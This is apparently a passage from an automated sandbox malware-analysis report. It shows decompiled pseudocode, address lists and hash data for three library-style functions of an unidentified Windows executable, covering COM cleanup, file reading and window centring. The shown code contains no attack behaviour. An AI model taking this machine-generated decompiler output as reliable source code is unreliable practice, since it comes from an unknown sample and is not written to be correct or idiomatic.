                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                              • API String ID: 1646373207-3105848591
                                                                              • Opcode ID: 673601ef4af6a368d6f370bbffffa8d98a2589559b18c2793c46341561166bb2
                                                                              • Instruction ID: b0d684946a038633be7e300e1b9a9ffa78109251a747c1e9c719707c1f5255e3
                                                                              • Opcode Fuzzy Hash: 673601ef4af6a368d6f370bbffffa8d98a2589559b18c2793c46341561166bb2
                                                                              • Instruction Fuzzy Hash: B4C0127074A60452FD101B712D1AB562214EB44B42F5410536816D05A4EA98D251902F
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040FD5E, Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 69%
                                                                              			E0040FD5E(intOrPtr __ecx, intOrPtr* __edi) {
				void* __ebx;
				void* __esi;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t91;
				intOrPtr _t104;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t148;
				intOrPtr* _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				intOrPtr _t167;
				intOrPtr* _t168;
				void* _t170;
				intOrPtr _t183;

				_t161 = __edi;
				E004128A0(E0043121D, _t170);
				_t167 = __ecx;
				 *((intOrPtr*)(_t170 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x44ad44;
				 *(_t170 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t121 =  *((intOrPtr*)(__ecx + 0x50));
					if(_t121 != 0) {
						_t122 =  *_t121;
						_push(_t170 - 0x14);
						_push(0x44df9c);
						_push(_t122);
						if( *((intOrPtr*)( *_t122))() >= 0) {
							_t124 =  *((intOrPtr*)(_t170 - 0x14));
							_push(_t170 - 0x10);
							_push(0x44e0dc);
							 *((intOrPtr*)(_t170 - 0x10)) = 0;
							_push(_t124);
							if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
								_t128 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
								_t130 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t130 + 8))(_t130);
							}
							_t126 =  *((intOrPtr*)(_t170 - 0x14));
							 *((intOrPtr*)( *_t126 + 8))(_t126);
						}
					}
				}
				_push(_t161);
				L8:
				if( *((intOrPtr*)(_t167 + 0x24)) != 0) {
					_t161 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x1c)) + 8));
					 *((intOrPtr*)( *((intOrPtr*)( *_t161)) + 0xbc))( *((intOrPtr*)(_t161 + 8)), 0);
					 *((intOrPtr*)( *_t161 + 0x94)) = 0;
					goto L8;
				}
				 *((intOrPtr*)(_t170 - 0x18)) = _t167 + 0x18;
				E004230D7(_t167 + 0x18);
				if( *((intOrPtr*)(_t167 + 0x40)) == 0) {
					L16:
					_t87 =  *((intOrPtr*)(_t167 + 8));
					if(_t87 != 0) {
						 *((intOrPtr*)( *_t87 + 8))(_t87);
					}
					_t88 =  *((intOrPtr*)(_t167 + 0xc));
					if(_t88 != 0) {
						 *((intOrPtr*)( *_t88 + 8))(_t88);
					}
					if( *((intOrPtr*)(_t167 + 0x14)) == 0) {
						L29:
						_t89 =  *((intOrPtr*)(_t167 + 0x34));
						if(_t89 != 0) {
							__imp__CoTaskMemFree(_t89);
						}
						_t138 =  *((intOrPtr*)(_t167 + 0x54));
						if( *((intOrPtr*)(_t167 + 0x54)) != 0) {
							E0040EE3B(_t138, _t161,  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x50)))));
							E0040B246( *((intOrPtr*)(_t167 + 0x54)));
						}
						_t162 =  *((intOrPtr*)(_t167 + 0x54));
						_t195 = _t162;
						if(_t162 != 0) {
							E0040B246(_t162);
							_push(_t162);
							L0042446B(0, _t162, _t167, _t195);
						}
						_t163 =  *((intOrPtr*)(_t167 + 0x50));
						_t196 = _t163;
						if(_t163 != 0) {
							E0040FAE0(_t163, _t196);
							_push(_t163);
							L0042446B(0, _t163, _t167, _t196);
						}
						_t90 =  *((intOrPtr*)(_t167 + 0x4c));
						if(_t90 != 0) {
							 *((intOrPtr*)( *_t90 + 8))(_t90);
						}
						_t168 =  *((intOrPtr*)(_t167 + 0x48));
						if(_t168 != 0) {
							 *((intOrPtr*)( *_t168 + 8))(_t168);
						}
						 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
						_t91 = E004231BF( *((intOrPtr*)(_t170 - 0x18)));
						 *[fs:0x0] =  *((intOrPtr*)(_t170 - 0xc));
						return _t91;
					} else {
						 *((intOrPtr*)(_t170 - 0x10)) = 0;
						if( *((intOrPtr*)(_t167 + 0x10)) <= 0) {
							L28:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t167 + 0x14)));
							goto L29;
						}
						_t165 = 0;
						do {
							_t104 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)) + 4));
							 *((intOrPtr*)(_t170 - 0x14)) = _t104;
							if(_t104 == 0) {
								goto L25;
							} else {
								goto L24;
							}
							do {
								L24:
								 *((intOrPtr*)( *((intOrPtr*)(E00409D70(_t170 - 0x14))) + 0x94)) = 0;
							} while ( *((intOrPtr*)(_t170 - 0x14)) != 0);
							L25:
							E004230D7( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)));
							_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24));
							if(_t148 != 0) {
								 *((intOrPtr*)( *_t148 + 4))(1);
							}
							 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 1;
							_t165 = _t165 + 0x28;
						} while ( *((intOrPtr*)(_t170 - 0x10)) <  *((intOrPtr*)(_t167 + 0x10)));
						goto L28;
					}
				}
				_t161 = 0;
				if( *((intOrPtr*)(_t167 + 0x38)) <= 0) {
					L14:
					if(_t183 != 0) {
						_push( *((intOrPtr*)(_t167 + 0x3c)));
						L0042446B(0, _t161, _t167, _t183);
						_push( *((intOrPtr*)(_t167 + 0x40)));
						L0042446B(0, _t161, _t167, _t183);
					}
					goto L16;
				}
				 *((intOrPtr*)(_t170 - 0x10)) = 0;
				do {
					__imp__#9( *((intOrPtr*)(_t167 + 0x40)) +  *((intOrPtr*)(_t170 - 0x10)));
					 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 0x10;
					_t161 = _t161 + 1;
				} while (_t161 <  *((intOrPtr*)(_t167 + 0x38)));
				_t183 =  *((intOrPtr*)(_t167 + 0x38));
				goto L14;
			}


























                                                                              0x0040fd5e
                                                                              0x0040fd63
                                                                              0x0040fd6d
                                                                              0x0040fd6f
                                                                              0x0040fd72
                                                                              0x0040fd7d
                                                                              0x0040fd80
                                                                              0x0040fd82
                                                                              0x0040fd87
                                                                              0x0040fd89
                                                                              0x0040fd90
                                                                              0x0040fd91
                                                                              0x0040fd96
                                                                              0x0040fd9b
                                                                              0x0040fd9d
                                                                              0x0040fda3
                                                                              0x0040fda4
                                                                              0x0040fda9
                                                                              0x0040fdae
                                                                              0x0040fdb4
                                                                              0x0040fdb6
                                                                              0x0040fdbf
                                                                              0x0040fdc2
                                                                              0x0040fdc8
                                                                              0x0040fdc8
                                                                              0x0040fdcb
                                                                              0x0040fdd1
                                                                              0x0040fdd1
                                                                              0x0040fd9b
                                                                              0x0040fd87
                                                                              0x0040fdd4
                                                                              0x0040fdf3
                                                                              0x0040fdf6
                                                                              0x0040fdda
                                                                              0x0040fde5
                                                                              0x0040fded
                                                                              0x00000000
                                                                              0x0040fded
                                                                              0x0040fdfb
                                                                              0x0040fdfe
                                                                              0x0040fe06
                                                                              0x0040fe40
                                                                              0x0040fe40
                                                                              0x0040fe45
                                                                              0x0040fe4a
                                                                              0x0040fe4a
                                                                              0x0040fe4d
                                                                              0x0040fe52
                                                                              0x0040fe57
                                                                              0x0040fe57
                                                                              0x0040fe5d
                                                                              0x0040fecc
                                                                              0x0040fecc
                                                                              0x0040fed1
                                                                              0x0040fed4
                                                                              0x0040fed4
                                                                              0x0040feda
                                                                              0x0040fedf
                                                                              0x0040fee6
                                                                              0x0040feee
                                                                              0x0040feee
                                                                              0x0040fef3
                                                                              0x0040fef6
                                                                              0x0040fef8
                                                                              0x0040fefc
                                                                              0x0040ff01
                                                                              0x0040ff02
                                                                              0x0040ff07
                                                                              0x0040ff08
                                                                              0x0040ff0b
                                                                              0x0040ff0d
                                                                              0x0040ff11
                                                                              0x0040ff16
                                                                              0x0040ff17
                                                                              0x0040ff1c
                                                                              0x0040ff1d
                                                                              0x0040ff23
                                                                              0x0040ff28
                                                                              0x0040ff28
                                                                              0x0040ff2b
                                                                              0x0040ff30
                                                                              0x0040ff35
                                                                              0x0040ff35
                                                                              0x0040ff3b
                                                                              0x0040ff3f
                                                                              0x0040ff49
                                                                              0x0040ff51
                                                                              0x0040fe5f
                                                                              0x0040fe62
                                                                              0x0040fe65
                                                                              0x0040fec3
                                                                              0x0040fec6
                                                                              0x00000000
                                                                              0x0040fec6
                                                                              0x0040fe67
                                                                              0x0040fe69
                                                                              0x0040fe70
                                                                              0x0040fe75
                                                                              0x0040fe78
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040fe7a
                                                                              0x0040fe7a
                                                                              0x0040fe8f
                                                                              0x0040fe8f
                                                                              0x0040fe97
                                                                              0x0040fe9e
                                                                              0x0040fea6
                                                                              0x0040feac
                                                                              0x0040feb2
                                                                              0x0040feb2
                                                                              0x0040feb5
                                                                              0x0040febb
                                                                              0x0040febe
                                                                              0x00000000
                                                                              0x0040fe69
                                                                              0x0040fe5d
                                                                              0x0040fe08
                                                                              0x0040fe0d
                                                                              0x0040fe2c
                                                                              0x0040fe2c
                                                                              0x0040fe2e
                                                                              0x0040fe31
                                                                              0x0040fe36
                                                                              0x0040fe39
                                                                              0x0040fe3f
                                                                              0x00000000
                                                                              0x0040fe2c
                                                                              0x0040fe0f
                                                                              0x0040fe12
                                                                              0x0040fe19
                                                                              0x0040fe1f
                                                                              0x0040fe23
                                                                              0x0040fe24
                                                                              0x0040fe29
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: FreeTask$ClearH_prologVariant
                                                                              • String ID:
                                                                              • API String ID: 82050969-0
                                                                              • Opcode ID: 3a143527f614caeb7e7730fd3bf0f55a118291347b53d119de88ce97be427d2c
                                                                              • Instruction ID: cb6c129e7678bd8cc6b55dbe0d46a684bcb0eda1608f896789917ea28fa2f24b
                                                                              • Opcode Fuzzy Hash: 3a143527f614caeb7e7730fd3bf0f55a118291347b53d119de88ce97be427d2c
                                                                              • Instruction Fuzzy Hash: D0713671A00606DFCB20DFA5C98492AB7F2FF48304754097EE146A7AA2CB38EC45CB58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041E1DB, Relevance: 6.2, APIs: 4, Instructions: 167fileCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0041E1DB(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t79;
				void* _t82;
				signed int _t86;
				signed int* _t89;
				long _t90;
				void* _t92;
				intOrPtr _t93;
				signed int _t97;
				intOrPtr _t98;
				char _t100;
				signed int _t101;
				long _t103;
				long _t106;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				signed char _t117;
				intOrPtr _t118;
				long _t120;
				void* _t124;
				intOrPtr* _t125;
				signed int _t127;
				signed char* _t128;
				void* _t129;
				void* _t130;

				_v12 = _v12 & 0x00000000;
				_t113 = _a8;
				_t124 = _t113;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t79 = _a4;
				_t125 = 0x45bb20 + (_t79 >> 5) * 4;
				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
				_t82 =  *_t125 + _t127;
				_t117 =  *((intOrPtr*)(_t82 + 4));
				if((_t117 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
					_a12 = _a12 - 1;
					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
					_t124 = _t113 + 1;
					_v12 = 1;
					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
				}
				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
					_t86 = _v16;
					_t118 =  *_t125;
					_v12 = _v12 + _t86;
					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						L15:
						_t89 =  *_t125 + _t127 + 4;
						 *_t89 =  *_t89 & 0x000000fb;
						__eflags =  *_t89;
						L16:
						_t90 = _a8;
						_t120 = _v12 + _t90;
						__eflags = _t90 - _t120;
						_a12 = _t90;
						_v12 = _t120;
						if(_t90 >= _t120) {
							L40:
							_t114 = _t113 - _a8;
							__eflags = _t114;
							_v12 = _t114;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t92 =  *_a12;
							__eflags = _t92 - 0x1a;
							if(_t92 == 0x1a) {
								break;
							}
							__eflags = _t92 - 0xd;
							if(_t92 == 0xd) {
								__eflags = _a12 - _t120 - 1;
								if(_a12 >= _t120 - 1) {
									_a12 = _a12 + 1;
									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
									__eflags = _t97;
									if(_t97 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t113 = 0xd;
											L35:
											_t113 = _t113 + 1;
											__eflags = _t113;
											L36:
											_t120 = _v12;
											__eflags = _a12 - _t120;
											if(_a12 < _t120) {
												continue;
											}
											goto L40;
										}
										_t98 =  *_t125;
										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
											__eflags = _t113 - _a8;
											if(__eflags != 0) {
												L33:
												E0041C832(__eflags, _a4, 0xffffffff, 1);
												_t130 = _t130 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t113 = 0xa;
											goto L35;
										}
										_t100 = _v5;
										__eflags = _t100 - 0xa;
										if(_t100 == 0xa) {
											goto L32;
										}
										 *_t113 = 0xd;
										 *((char*)( *_t125 + _t127 + 5)) = _t100;
										goto L35;
									}
									_t101 = GetLastError();
									__eflags = _t101;
									if(_t101 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t103 = _a12 + 1;
								__eflags =  *_t103 - 0xa;
								if( *_t103 != 0xa) {
									_a12 = _t103;
									goto L34;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t113 = _t92;
							_t113 = _t113 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t93 =  *_t125;
						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
							_t128 = _t93 + _t127 + 4;
							 *_t128 =  *_t128 | 0x00000002;
							__eflags =  *_t128;
						}
						goto L40;
					}
					__eflags =  *_t113 - 0xa;
					if( *_t113 != 0xa) {
						goto L15;
					}
					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
					goto L16;
				} else {
					_t106 = GetLastError();
					_t129 = 5;
					if(_t106 != _t129) {
						__eflags = _t106 - 0x6d;
						if(_t106 == 0x6d) {
							goto L42;
						}
						_t107 = E0041420C(_t106);
						L10:
						return _t107 | 0xffffffff;
					}
					 *((intOrPtr*)(E004141FA())) = 9;
					_t107 = E00414203();
					 *_t107 = _t129;
					goto L10;
				}
			}































                                                                              0x0041e1e1
                                                                              0x0041e1ea
                                                                              0x0041e1ef
                                                                              0x0041e1f1
                                                                              0x0041e3af
                                                                              0x0041e3af
                                                                              0x00000000
                                                                              0x0041e3af
                                                                              0x0041e1f7
                                                                              0x0041e205
                                                                              0x0041e20e
                                                                              0x0041e211
                                                                              0x0041e213
                                                                              0x0041e219
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e222
                                                                              0x0041e230
                                                                              0x0041e233
                                                                              0x0041e237
                                                                              0x0041e23a
                                                                              0x0041e241
                                                                              0x0041e241
                                                                              0x0041e25d
                                                                              0x0041e298
                                                                              0x0041e29b
                                                                              0x0041e29d
                                                                              0x0041e2a0
                                                                              0x0041e2a5
                                                                              0x0041e3aa
                                                                              0x00000000
                                                                              0x0041e3aa
                                                                              0x0041e2ab
                                                                              0x0041e2ad
                                                                              0x0041e2bf
                                                                              0x0041e2c1
                                                                              0x0041e2c5
                                                                              0x0041e2c5
                                                                              0x0041e2c8
                                                                              0x0041e2c8
                                                                              0x0041e2ce
                                                                              0x0041e2d0
                                                                              0x0041e2d2
                                                                              0x0041e2d5
                                                                              0x0041e2d8
                                                                              0x0041e3a4
                                                                              0x0041e3a4
                                                                              0x0041e3a4
                                                                              0x0041e3a7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e2de
                                                                              0x0041e2de
                                                                              0x0041e2e1
                                                                              0x0041e2e3
                                                                              0x0041e2e5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e2eb
                                                                              0x0041e2ed
                                                                              0x0041e2fb
                                                                              0x0041e2fe
                                                                              0x0041e314
                                                                              0x0041e328
                                                                              0x0041e32e
                                                                              0x0041e330
                                                                              0x0041e33c
                                                                              0x0041e33c
                                                                              0x0041e340
                                                                              0x0041e382
                                                                              0x0041e382
                                                                              0x0041e385
                                                                              0x0041e385
                                                                              0x0041e385
                                                                              0x0041e386
                                                                              0x0041e386
                                                                              0x0041e389
                                                                              0x0041e38c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e392
                                                                              0x0041e342
                                                                              0x0041e344
                                                                              0x0041e349
                                                                              0x0041e35d
                                                                              0x0041e360
                                                                              0x0041e36d
                                                                              0x0041e374
                                                                              0x0041e379
                                                                              0x0041e37c
                                                                              0x0041e380
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e380
                                                                              0x0041e362
                                                                              0x0041e366
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e368
                                                                              0x0041e368
                                                                              0x00000000
                                                                              0x0041e368
                                                                              0x0041e34b
                                                                              0x0041e34e
                                                                              0x0041e350
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e352
                                                                              0x0041e357
                                                                              0x00000000
                                                                              0x0041e357
                                                                              0x0041e332
                                                                              0x0041e338
                                                                              0x0041e33a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e33a
                                                                              0x0041e303
                                                                              0x0041e304
                                                                              0x0041e307
                                                                              0x0041e30f
                                                                              0x00000000
                                                                              0x0041e30f
                                                                              0x0041e309
                                                                              0x00000000
                                                                              0x0041e309
                                                                              0x0041e2ef
                                                                              0x0041e2f1
                                                                              0x0041e2f2
                                                                              0x00000000
                                                                              0x0041e2f2
                                                                              0x0041e394
                                                                              0x0041e396
                                                                              0x0041e39b
                                                                              0x0041e39d
                                                                              0x0041e3a1
                                                                              0x0041e3a1
                                                                              0x0041e3a1
                                                                              0x00000000
                                                                              0x0041e39b
                                                                              0x0041e2af
                                                                              0x0041e2b2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e2ba
                                                                              0x00000000
                                                                              0x0041e25f
                                                                              0x0041e25f
                                                                              0x0041e267
                                                                              0x0041e26a
                                                                              0x0041e280
                                                                              0x0041e283
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e28a
                                                                              0x0041e290
                                                                              0x00000000
                                                                              0x0041e290
                                                                              0x0041e271
                                                                              0x0041e277
                                                                              0x0041e27c
                                                                              0x00000000
                                                                              0x0041e27c

                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,0044C3B0,?,?), ref: 0041E255
                                                                              • GetLastError.KERNEL32 ref: 0041E25F
                                                                              • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 0041E328
                                                                              • GetLastError.KERNEL32 ref: 0041E332
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastRead
                                                                              • String ID:
                                                                              • API String ID: 1948546556-0
                                                                              • Opcode ID: d5626c89196841c975677f9fe0405f4ed7f6318b0b1d247cbc0b4242e5a74cf5
                                                                              • Instruction ID: c2ec8804dca23fd16efb83461666c81868fedb357b026b5ad42fe2558f67134d
                                                                              • Opcode Fuzzy Hash: d5626c89196841c975677f9fe0405f4ed7f6318b0b1d247cbc0b4242e5a74cf5
                                                                              • Instruction Fuzzy Hash: 0361A138604389DFDB218F59C884BEA7BA4AF06304F14419AEC658B291D378DAC5CB5A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040F93E, Relevance: 6.2, APIs: 4, Instructions: 165windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 63%
                                                                              			E0040F93E(intOrPtr* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				void* __ebp;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t84;
				void* _t107;
				void* _t126;
				intOrPtr _t130;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				intOrPtr _t137;
				void* _t138;

				_t126 = __edx;
				_t136 = __ecx;
				_t130 = E004270C8( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
				_v12 = _t130;
				_t58 = IsWindowVisible( *(_t130 + 0x1c));
				asm("sbb eax, eax");
				_t60 =  ~_t58 + 1;
				_v24 = _t60;
				_t107 = 0;
				if(_t60 != 0) {
					GetWindowRect( *(E00426406(_t138, GetDesktopWindow()) + 0x1c),  &_v56);
					GetWindowRect( *(_t130 + 0x1c),  &_v40);
					asm("cdq");
					asm("cdq");
					E004283E5(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
					E00428423(_t130, 1);
				}
				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t136 + 4)) + 0x4c));
				_t131 = _t136 + 0x48;
				_push(_t131);
				_push(0x44ad30);
				_push(_t62);
				if( *((intOrPtr*)( *_t62))() < 0) {
					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t136 + 4)) + 0x4c));
					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x44ac88,  &_v16);
					if(_t66 >= _t107) {
						_t67 = _v16;
						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
						_t69 = _v16;
						 *((intOrPtr*)( *_t69 + 8))(_t69);
						_t71 = _v20;
						if(_t71 != _t107) {
							_t133 = _t136 + 8;
							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x44ddac, _t133);
							_t73 = _v20;
							 *((intOrPtr*)( *_t73 + 8))(_t73);
							_t66 = _v8;
							if(_t66 >= _t107) {
								_t134 =  *_t133;
								 *((intOrPtr*)( *_t134))(_t134, 0x44dd9c, _t136 + 0xc);
								goto L14;
							}
						} else {
							_t66 = 0x80004005;
						}
					}
				} else {
					_t84 =  *_t131;
					_t135 = _t136 + 0x4c;
					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x44e02c, _t135);
					if( *_t135 == _t107) {
						_v8 = 0x80004003;
					}
					if(_v8 >= _t107) {
						L14:
						_t137 = E0040F4FE(_t136);
						if(_v24 != _t107) {
							E004283E5(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E00428423(_v12, _t107);
						}
						_t66 = _t137;
					} else {
						if(_v24 != _t107) {
							E004283E5(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E00428423(_v12, _t107);
						}
						_t66 = _v8;
					}
				}
				return _t66;
			}































                                                                              0x0040f93e
                                                                              0x0040f946
                                                                              0x0040f954
                                                                              0x0040f959
                                                                              0x0040f95c
                                                                              0x0040f964
                                                                              0x0040f966
                                                                              0x0040f969
                                                                              0x0040f96c
                                                                              0x0040f96d
                                                                              0x0040f982
                                                                              0x0040f98f
                                                                              0x0040f99c
                                                                              0x0040f9ac
                                                                              0x0040f9b2
                                                                              0x0040f9bb
                                                                              0x0040f9bb
                                                                              0x0040f9c3
                                                                              0x0040f9c8
                                                                              0x0040f9cb
                                                                              0x0040f9cc
                                                                              0x0040f9d1
                                                                              0x0040f9d6
                                                                              0x0040fa37
                                                                              0x0040fa46
                                                                              0x0040fa4a
                                                                              0x0040fa50
                                                                              0x0040fa5a
                                                                              0x0040fa5d
                                                                              0x0040fa63
                                                                              0x0040fa66
                                                                              0x0040fa6b
                                                                              0x0040fa76
                                                                              0x0040fa82
                                                                              0x0040fa85
                                                                              0x0040fa8b
                                                                              0x0040fa8e
                                                                              0x0040fa93
                                                                              0x0040fa95
                                                                              0x0040faa3
                                                                              0x00000000
                                                                              0x0040faa3
                                                                              0x0040fa6d
                                                                              0x0040fa6d
                                                                              0x0040fa6d
                                                                              0x0040fa6b
                                                                              0x0040f9d8
                                                                              0x0040f9d8
                                                                              0x0040f9dc
                                                                              0x0040f9ec
                                                                              0x0040f9ef
                                                                              0x0040f9f1
                                                                              0x0040f9f1
                                                                              0x0040f9fb
                                                                              0x0040faa5
                                                                              0x0040faaf
                                                                              0x0040fab1
                                                                              0x0040facb
                                                                              0x0040fad4
                                                                              0x0040fad4
                                                                              0x0040fad9
                                                                              0x0040fa01
                                                                              0x0040fa04
                                                                              0x0040fa1e
                                                                              0x0040fa27
                                                                              0x0040fa27
                                                                              0x0040fa2c
                                                                              0x0040fa2c
                                                                              0x0040f9fb
                                                                              0x0040fadf

                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 0040F95C
                                                                              • GetDesktopWindow.USER32 ref: 0040F96F
                                                                              • GetWindowRect.USER32 ref: 0040F982
                                                                              • GetWindowRect.USER32 ref: 0040F98F
                                                                                • Part of subcall function 004283E5: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,0040FAD0,?,?), ref: 00428400
                                                                                • Part of subcall function 00428423: ShowWindow.USER32(?,?,0040FAD9,00000000,?,?), ref: 00428430
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
